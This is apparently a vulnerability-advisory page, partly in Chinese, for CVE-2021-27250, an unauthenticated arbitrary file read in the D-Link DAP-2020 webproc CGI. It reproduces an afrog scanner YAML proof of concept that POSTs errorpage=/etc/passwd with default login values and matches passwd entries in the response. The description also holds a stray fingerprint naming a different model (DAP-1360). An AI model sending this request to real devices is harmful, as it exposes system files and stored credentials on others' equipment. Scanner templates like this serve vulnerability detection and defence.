CVE-2021-27250: D-LINK DAP-2020 webproc 任意文件读取漏洞

日期: 2025-08-01 | 影响软件: D-LINK DAP-2020 | POC: 已公开

漏洞描述

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of D-Link DAP-2020 v1.01rc001 Wi-Fi access points. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of CGI scripts. When parsing the errorpage request parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-11856. body="DAP-1360" && body="6.05"

PoC代码[已公开]

id: CVE-2021-27250

info:
  name: D-LINK DAP-2020 webproc 任意文件读取漏洞
  author: zan8in
  severity: medium
  description: |-
    This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of D-Link DAP-2020 v1.01rc001 Wi-Fi access points. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of CGI scripts. When parsing the errorpage request parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-11856.
    body="DAP-1360" && body="6.05"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27250
  tags: cve,cve2021,dlink,fileread
  created: 2023/07/13

rules:
  r0:
    request:
      method: POST
      path: /cgi-bin/webproc
      body: |
        getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-27250.yaml